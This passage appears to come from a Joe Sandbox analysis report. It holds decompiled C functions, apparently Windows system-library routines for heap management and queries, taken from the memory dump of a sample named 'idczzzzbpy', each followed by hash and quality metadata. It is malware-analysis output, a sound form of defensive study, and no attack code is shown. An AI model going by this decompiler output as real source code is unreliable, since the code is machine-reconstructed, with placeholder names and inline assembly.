                    								_t79 = E016AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1641668)), _t82);
                    								_t104 = _t104 + 0xc;
                    								__eflags = _t79;
                    								if(__eflags == 0) {
                    									_t102 = E016E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x164166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                    									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                    									break;
                    								} else {
                    									_t64 =  *(_t103 - 0x24);
                    									goto L5;
                    								}
                    								goto L13;
                    							} else {
                    								L5:
                    								_t64 = _t64 - 1;
                    								continue;
                    							}
                    						}
                    						break;
                    					}
                    					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                    					__eflags = _t102;
                    					if(_t102 < 0) {
                    						__eflags = _t102 - 0xc0000100;
                    						if(_t102 == 0xc0000100) {
                    							_t83 =  *((intOrPtr*)(_t103 + 8));
                    							__eflags = _t83;
                    							if(_t83 != 0) {
                    								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                    								__eflags =  *_t83 - _t99;
                    								if( *_t83 == _t99) {
                    									_t102 = 0xc0000100;
                    									goto L19;
                    								} else {
                    									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                    									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                    									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                    									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                    										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                    										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                    											L26:
                    											_t102 = E01692AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                    											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                    											__eflags = _t102 - 0xc0000100;
                    											if(_t102 != 0xc0000100) {
                    												goto L12;
                    											} else {
                    												_t99 = 1;
                    												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                    												goto L18;
                    											}
                    										} else {
                    											_t69 = E01676600( *((intOrPtr*)(_t91 + 0x1c)));
                    											__eflags = _t69;
                    											if(_t69 != 0) {
                    												goto L26;
                    											} else {
                    												_t83 =  *((intOrPtr*)(_t103 + 8));
                    												goto L18;
                    											}
                    										}
                    									} else {
                    										L18:
                    										_t102 = E01692C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                    										L19:
                    										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                    										goto L12;
                    									}
                    								}
                    								L28:
                    							} else {
                    								E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                    								 *((intOrPtr*)(_t103 - 4)) = 1;
                    								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                    								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                    								_t76 = E01692AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                    								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                    								__eflags = _t76 - 0xc0000100;
                    								if(_t76 == 0xc0000100) {
                    									 *((intOrPtr*)(_t103 - 0x1c)) = E01692C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                    								}
                    								 *((intOrPtr*)(_t103 - 4)) = _t99;
                    								E01692ACB();
                    							}
                    						}
                    					}
                    					L12:
                    					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                    					_t62 = _t102;
                    				}
                    				L13:
                    				return E016BD0D1(_t62);
                    				goto L28;
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 494bd3ab38b8e450d0213e061c6f3449cb1a67c16bbdbe208a2a24ed065245eb
                    • Instruction ID: 0be96fc1bcabcfd73733a368521216f7852cb59ed00d59e1895c3496780fea75
                    • Opcode Fuzzy Hash: 494bd3ab38b8e450d0213e061c6f3449cb1a67c16bbdbe208a2a24ed065245eb
                    • Instruction Fuzzy Hash: 39514A7290021AEFDF25DF59CC90AEEBBBABF58350F008159ED05AB320C3359952CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E01694BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                    				signed int _v8;
                    				short _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				char _v36;
                    				char _v156;
                    				short _v158;
                    				intOrPtr _v160;
                    				char _v164;
                    				intOrPtr _v168;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t45;
                    				intOrPtr _t74;
                    				signed char _t77;
                    				intOrPtr _t84;
                    				char* _t85;
                    				void* _t86;
                    				intOrPtr _t87;
                    				signed short _t88;
                    				signed int _t89;
                    
                    				_t83 = __edx;
                    				_v8 =  *0x175d360 ^ _t89;
                    				_t45 = _a8 & 0x0000ffff;
                    				_v158 = __edx;
                    				_v168 = __ecx;
                    				if(_t45 == 0) {
                    					L22:
                    					_t86 = 6;
                    					L12:
                    					E0166CC50(_t86);
                    					L11:
                    					return E016AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                    				}
                    				_t77 = _a4;
                    				if((_t77 & 0x00000001) != 0) {
                    					goto L22;
                    				}
                    				_t8 = _t77 + 0x34; // 0xdce0ba00
                    				if(_t45 !=  *_t8) {
                    					goto L22;
                    				}
                    				_t9 = _t77 + 0x24; // 0x1758504
                    				E01682280(_t9, _t9);
                    				_t87 = 0x78;
                    				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                    				E016AFA60( &_v156, 0, _t87);
                    				_t13 = _t77 + 0x30; // 0x3db8
                    				_t85 =  &_v156;
                    				_v36 =  *_t13;
                    				_v28 = _v168;
                    				_v32 = 0;
                    				_v24 = 0;
                    				_v20 = _v158;
                    				_v160 = 0;
                    				while(1) {
                    					_push( &_v164);
                    					_push(_t87);
                    					_push(_t85);
                    					_push(0x18);
                    					_push( &_v36);
                    					_push(0x1e);
                    					_t88 = E016AB0B0();
                    					if(_t88 != 0xc0000023) {
                    						break;
                    					}
                    					if(_t85 !=  &_v156) {
                    						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                    					}
                    					_t84 = L01684620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                    					_v168 = _v164;
                    					if(_t84 == 0) {
                    						_t88 = 0xc0000017;
                    						goto L19;
                    					} else {
                    						_t74 = _v160 + 1;
                    						_v160 = _t74;
                    						if(_t74 >= 0x10) {
                    							L19:
                    							_t86 = E0166CCC0(_t88);
                    							if(_t86 != 0) {
                    								L8:
                    								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                    								_t30 = _t77 + 0x24; // 0x1758504
                    								E0167FFB0(_t77, _t84, _t30);
                    								if(_t84 != 0 && _t84 !=  &_v156) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                    								}
                    								if(_t86 != 0) {
                    									goto L12;
                    								} else {
                    									goto L11;
                    								}
                    							}
                    							L6:
                    							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                    							if(_v164 != 0) {
                    								_t83 = _t84;
                    								E01694F49(_t77, _t84);
                    							}
                    							goto L8;
                    						}
                    						_t87 = _v168;
                    						continue;
                    					}
                    				}
                    				if(_t88 != 0) {
                    					goto L19;
                    				}
                    				goto L6;
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 726a909bbb252e24a462a23bf07a88ad90e8b5fa4244dd3e5e3deba68d0b59d4
                    • Instruction ID: d17c49c45cc187f3021068fcb8b9948eb9bab66543b2f1f55ade7af7bb7010ef
                    • Opcode Fuzzy Hash: 726a909bbb252e24a462a23bf07a88ad90e8b5fa4244dd3e5e3deba68d0b59d4
                    • Instruction Fuzzy Hash: 71418035E00269DFDF21EF68CD40BEA77B9AF45710F0104A9E908AB341EB749E85CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E01694D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                    				signed int _v12;
                    				char _v176;
                    				char _v177;
                    				char _v184;
                    				intOrPtr _v192;
                    				intOrPtr _v196;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed short _t42;
                    				char* _t44;
                    				intOrPtr _t46;
                    				intOrPtr _t50;
                    				char* _t57;
                    				intOrPtr _t59;
                    				intOrPtr _t67;
                    				signed int _t69;
                    
                    				_t64 = __edx;
                    				_v12 =  *0x175d360 ^ _t69;
                    				_t65 = 0xa0;
                    				_v196 = __edx;
                    				_v177 = 0;
                    				_t67 = __ecx;
                    				_v192 = __ecx;
                    				E016AFA60( &_v176, 0, 0xa0);
                    				_t57 =  &_v176;
                    				_t59 = 0xa0;
                    				if( *0x1757bc8 != 0) {
                    					L3:
                    					while(1) {
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						asm("movsd");
                    						_t67 = _v192;
                    						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                    						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                    						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                    						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                    						_push( &_v184);
                    						_push(_t59);
                    						_push(_t57);
                    						_push(0xa0);
                    						_push(_t57);
                    						_push(0xf);
                    						_t42 = E016AB0B0();
                    						if(_t42 != 0xc0000023) {
                    							break;
                    						}
                    						if(_v177 != 0) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                    						}
                    						_v177 = 1;
                    						_t44 = L01684620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                    						_t59 = _v184;
                    						_t57 = _t44;
                    						if(_t57 != 0) {
                    							continue;
                    						} else {
                    							_t42 = 0xc0000017;
                    							break;
                    						}
                    					}
                    					if(_t42 != 0) {
                    						_t65 = E0166CCC0(_t42);
                    						if(_t65 != 0) {
                    							L10:
                    							if(_v177 != 0) {
                    								if(_t57 != 0) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                    								}
                    							}
                    							_t46 = _t65;
                    							L12:
                    							return E016AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                    						}
                    						L7:
                    						_t50 = _a4;
                    						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                    						if(_t50 != 3) {
                    							if(_t50 == 2) {
                    								goto L8;
                    							}
                    							L9:
                    							if(E016AF380(_t67 + 0xc, 0x1645138, 0x10) == 0) {
                    								 *0x17560d8 = _t67;
                    							}
                    							goto L10;
                    						}
                    						L8:
                    						_t64 = _t57 + 0x28;
                    						E01694F49(_t67, _t57 + 0x28);
                    						goto L9;
                    					}
                    					_t65 = 0;
                    					goto L7;
                    				}
                    				if(E01694E70(0x17586b0, 0x1695690, 0, 0) != 0) {
                    					_t46 = E0166CCC0(_t56);
                    					goto L12;
                    				} else {
                    					_t59 = 0xa0;
                    					goto L3;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77413d832b2f15103956f41bf9db9c17e43fe7a06c5fbad53ee2d0a9230cd0c6
                    • Instruction ID: 2902a21dc314f242d1504635184c156440c2287e23bc1d627e8ad8c5fb4002dd
                    • Opcode Fuzzy Hash: 77413d832b2f15103956f41bf9db9c17e43fe7a06c5fbad53ee2d0a9230cd0c6
                    • Instruction Fuzzy Hash: 0A41B175A443189FEF32DF18CD80FAAB7AAEB54610F00409AE9459B381DBB0DD45CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0172AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                    				intOrPtr _v8;
                    				char _v12;
                    				signed int _v16;
                    				signed char _v20;
                    				intOrPtr _v24;
                    				char* _t37;
                    				void* _t47;
                    				signed char _t51;
                    				void* _t53;
                    				char _t55;
                    				intOrPtr _t57;
                    				signed char _t61;
                    				intOrPtr _t75;
                    				void* _t76;
                    				signed int _t81;
                    				intOrPtr _t82;
                    
                    				_t53 = __ecx;
                    				_t55 = 0;
                    				_v20 = _v20 & 0;
                    				_t75 = __edx;
                    				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                    				_v24 = __edx;
                    				_v12 = 0;
                    				if((_t81 & 0x01000000) != 0) {
                    					L5:
                    					if(_a8 != 0) {
                    						_t81 = _t81 | 0x00000008;
                    					}
                    					_t57 = E0172ABF4(_t55 + _t75, _t81);
                    					_v8 = _t57;
                    					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                    						_t76 = 0;
                    						_v16 = _v16 & 0;
                    					} else {
                    						_t59 = _t53;
                    						_t76 = E0172AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                    						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                    							_t47 = E0172AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                    							_t61 = _v20;
                    							if(_t61 != 0) {
                    								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                    								if(E0170CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                    									L016877F0(_t53, 0, _t76);
                    									_t76 = 0;
                    								}
                    							}
                    						}
                    					}
                    					_t82 = _v8;
                    					L16:
                    					if(E01687D50() == 0) {
                    						_t37 = 0x7ffe0380;
                    					} else {
                    						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    						E0172131B(_t53, _t76, _t82, _v16);
                    					}
                    					return _t76;
                    				}
                    				_t51 =  *(__ecx + 0x20);
                    				_v20 = _t51;
                    				if(_t51 == 0) {
                    					goto L5;
                    				}
                    				_t81 = _t81 | 0x00000008;
                    				if(E0170CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                    					_t55 = _v12;
                    					goto L5;
                    				} else {
                    					_t82 = 0;
                    					_t76 = 0;
                    					_v16 = _v16 & 0;
                    					goto L16;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction ID: 08130fa2bade56954e26ef7b70e7211662a112abfc5fc5dfa671540b0d3f8dcb
                    • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                    • Instruction Fuzzy Hash: 52312432F00225ABEB159B69CC44FBFFBBBEF84210F054469E800A7A81DA70CD02C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E01678A0A(intOrPtr* __ecx, signed int __edx) {
                    				signed int _v8;
                    				char _v524;
                    				signed int _v528;
                    				void* _v532;
                    				char _v536;
                    				char _v540;
                    				char _v544;
                    				intOrPtr* _v548;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t44;
                    				void* _t46;
                    				void* _t48;
                    				signed int _t53;
                    				signed int _t55;
                    				intOrPtr* _t62;
                    				void* _t63;
                    				unsigned int _t75;
                    				signed int _t79;
                    				unsigned int _t81;
                    				unsigned int _t83;
                    				signed int _t84;
                    				void* _t87;
                    
                    				_t76 = __edx;
                    				_v8 =  *0x175d360 ^ _t84;
                    				_v536 = 0x200;
                    				_t79 = 0;
                    				_v548 = __edx;
                    				_v544 = 0;
                    				_t62 = __ecx;
                    				_v540 = 0;
                    				_v532 =  &_v524;
                    				if(__edx == 0 || __ecx == 0) {
                    					L6:
                    					return E016AB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                    				} else {
                    					_v528 = 0;
                    					E0167E9C0(1, __ecx, 0, 0,  &_v528);
                    					_t44 = _v528;
                    					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                    					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                    					_t46 = 0xa;
                    					_t87 = _t81 - _t46;
                    					if(_t87 > 0 || _t87 == 0) {
                    						 *_v548 = 0x1641180;
                    						L5:
                    						_t79 = 1;
                    						goto L6;
                    					} else {
                    						_t48 = E01691DB5(_t62,  &_v532,  &_v536);
                    						_t76 = _v528;
                    						if(_t48 == 0) {
                    							L9:
                    							E016A3C2A(_t81, _t76,  &_v544);
                    							 *_v548 = _v544;
                    							goto L5;
                    						}
                    						_t62 = _v532;
                    						if(_t62 != 0) {
                    							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                    							_t53 =  *_t62;
                    							_v528 = _t53;
                    							if(_t53 != 0) {
                    								_t63 = _t62 + 4;
                    								_t55 = _v528;
                    								do {
                    									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                    										if(E01678999(_t63,  &_v540) == 0) {
                    											_t55 = _v528;
                    										} else {
                    											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                    											_t55 = _v528;
                    											if(_t75 >= _t83) {
                    												_t83 = _t75;
                    											}
                    										}
                    									}
                    									_t63 = _t63 + 0x14;
                    									_t55 = _t55 - 1;
                    									_v528 = _t55;
                    								} while (_t55 != 0);
                    								_t62 = _v532;
                    							}
                    							if(_t62 !=  &_v524) {
                    								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                    							}
                    							_t76 = _t83 & 0x0000ffff;
                    							_t81 = _t83 >> 0x10;
                    						}
                    						goto L9;
                    					}
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33cebadeed83b2aa214b82d2391bf84980b09915c29c888e135cfdb86aac7be3
                    • Instruction ID: a3d973472ff33cead9b1146628e0147bae8bf08b19df50f82b300a6b8226c213
                    • Opcode Fuzzy Hash: 33cebadeed83b2aa214b82d2391bf84980b09915c29c888e135cfdb86aac7be3
                    • Instruction Fuzzy Hash: 33417EB1A003299BDB24DF59CC8CABAB7B9EB54700F1041EAD91997342E7709E80CF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0172FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                    				char _v8;
                    				signed int _v12;
                    				signed int _t29;
                    				char* _t32;
                    				char* _t43;
                    				signed int _t80;
                    				signed int* _t84;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t56 = __edx;
                    				_t84 = __ecx;
                    				_t80 = E0172FD4E(__ecx, __edx);
                    				_v12 = _t80;
                    				if(_t80 != 0) {
                    					_t29 =  *__ecx & _t80;
                    					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                    					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                    						E01730A13(__ecx, _t80, 0, _a4);
                    						_t80 = 1;
                    						if(E01687D50() == 0) {
                    							_t32 = 0x7ffe0380;
                    						} else {
                    							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    						}
                    						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                    							_push(3);
                    							L21:
                    							E01721608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                    						}
                    						goto L22;
                    					}
                    					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                    						_t80 = E01732B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                    						if(_t80 != 0) {
                    							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                    							_t77 = _v8;
                    							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                    								E0172C8F7(_t66, _t77, 0);
                    							}
                    						}
                    					} else {
                    						_t80 = E0172DBD2(__ecx[0xb], _t74, __edx, _a4);
                    					}
                    					if(E01687D50() == 0) {
                    						_t43 = 0x7ffe0380;
                    					} else {
                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                    					}
                    					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                    						goto L22;
                    					} else {
                    						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                    						goto L21;
                    					}
                    				} else {
                    					_push(__ecx);
                    					_push(_t80);
                    					E0172A80D(__ecx[0xf], 9, __edx, _t80);
                    					L22:
                    					return _t80;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction ID: 16754c1f09daebb72e95bb51647fbaf3c8f143dacc763711c5784449368aaae3
                    • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                    • Instruction Fuzzy Hash: DD31F432600651AFD3239B68C848F6AFBBAEBC9A50F184158E5468B746DA74DC43C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0172EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                    				signed int _v8;
                    				char _v12;
                    				intOrPtr _v15;
                    				char _v16;
                    				intOrPtr _v19;
                    				void* _v28;
                    				intOrPtr _v36;
                    				void* __ebx;
                    				void* __edi;
                    				signed char _t26;
                    				signed int _t27;
                    				char* _t40;
                    				unsigned int* _t50;
                    				intOrPtr* _t58;
                    				unsigned int _t59;
                    				char _t75;
                    				signed int _t86;
                    				intOrPtr _t88;
                    				intOrPtr* _t91;
                    
                    				_t75 = __edx;
                    				_t91 = __ecx;
                    				_v12 = __edx;
                    				_t50 = __ecx + 0x30;
                    				_t86 = _a4 & 0x00000001;
                    				if(_t86 == 0) {
                    					E01682280(_t26, _t50);
                    					_t75 = _v16;
                    				}
                    				_t58 = _t91;
                    				_t27 = E0172E815(_t58, _t75);
                    				_v8 = _t27;
                    				if(_t27 != 0) {
                    					E0166F900(_t91 + 0x34, _t27);
                    					if(_t86 == 0) {
                    						E0167FFB0(_t50, _t86, _t50);
                    					}
                    					_push( *((intOrPtr*)(_t91 + 4)));
                    					_push( *_t91);
                    					_t59 =  *(_v8 + 0x10);
                    					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                    					_push(0x8000);
                    					_t11 = _t53 - 1; // 0x0
                    					_t12 = _t53 - 1; // 0x0
                    					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                    					E0172AFDE( &_v12,  &_v16);
                    					asm("lock xadd [eax], ecx");
                    					asm("lock xadd [eax], ecx");
                    					E0172BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                    					_t55 = _v36;
                    					_t88 = _v36;
                    					if(E01687D50() == 0) {
                    						_t40 = 0x7ffe0388;
                    					} else {
                    						_t55 = _v19;
                    						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                    					}
                    					if( *_t40 != 0) {
                    						E0171FE3F(_t55, _t91, _v15, _t55);
                    					}
                    				} else {
                    					if(_t86 == 0) {
                    						E0167FFB0(_t50, _t86, _t50);
                    						_t75 = _v16;
                    					}
                    					_push(_t58);
                    					_t88 = 0;
                    					_push(0);
                    					E0172A80D(_t91, 8, _t75, 0);
                    				}
                    				return _t88;
                    			}























                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction ID: 6e1a29199bfee6efeeccbfca4b419f2d7e07177ec0aaf24e9780e0df5daf2949
                    • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                    • Instruction Fuzzy Hash: 5431C3326047069BC719DF28CC84E6BF7AAFBC0210F04492DE59287645DE34E906CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E016E69A6(signed short* __ecx, void* __eflags) {
                    				signed int _v8;
                    				signed int _v16;
                    				intOrPtr _v20;
                    				signed int _v24;
                    				signed short _v28;
                    				signed int _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				char* _v44;
                    				signed int _v48;
                    				intOrPtr _v52;
                    				signed int _v56;
                    				char _v60;
                    				signed int _v64;
                    				char _v68;
                    				char _v72;
                    				signed short* _v76;
                    				signed int _v80;
                    				char _v84;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t68;
                    				intOrPtr _t73;
                    				signed short* _t74;
                    				void* _t77;
                    				void* _t78;
                    				signed int _t79;
                    				signed int _t80;
                    
                    				_v8 =  *0x175d360 ^ _t80;
                    				_t75 = 0x100;
                    				_v64 = _v64 & 0x00000000;
                    				_v76 = __ecx;
                    				_t79 = 0;
                    				_t68 = 0;
                    				_v72 = 1;
                    				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                    				_t77 = 0;
                    				if(L01676C59(__ecx[2], 0x100, __eflags) != 0) {
                    					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                    					if(_t79 != 0 && E016E6BA3() != 0) {
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0x1f0003);
                    						_push( &_v64);
                    						if(E016A9980() >= 0) {
                    							E01682280(_t56, 0x1758778);
                    							_t77 = 1;
                    							_t68 = 1;
                    							if( *0x1758774 == 0) {
                    								asm("cdq");
                    								 *(_t79 + 0xf70) = _v64;
                    								 *(_t79 + 0xf74) = 0x100;
                    								_t75 = 0;
                    								_t73 = 4;
                    								_v60 =  &_v68;
                    								_v52 = _t73;
                    								_v36 = _t73;
                    								_t74 = _v76;
                    								_v44 =  &_v72;
                    								 *0x1758774 = 1;
                    								_v56 = 0;
                    								_v28 = _t74[2];
                    								_v48 = 0;
                    								_v20 = ( *_t74 & 0x0000ffff) + 2;
                    								_v40 = 0;
                    								_v32 = 0;
                    								_v24 = 0;
                    								_v16 = 0;
                    								if(E0166B6F0(0x164c338, 0x164c288, 3,  &_v60) == 0) {
                    									_v80 = _v80 | 0xffffffff;
                    									_push( &_v84);
                    									_push(0);
                    									_push(_v64);
                    									_v84 = 0xfa0a1f00;
                    									E016A9520();
                    								}
                    							}
                    						}
                    					}
                    				}
                    				if(_v64 != 0) {
                    					_push(_v64);
                    					E016A95D0();
                    					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                    					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                    				}
                    				if(_t77 != 0) {
                    					E0167FFB0(_t68, _t77, 0x1758778);
                    				}
                    				_pop(_t78);
                    				return E016AB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                    			}

































                    Memory Dump Source
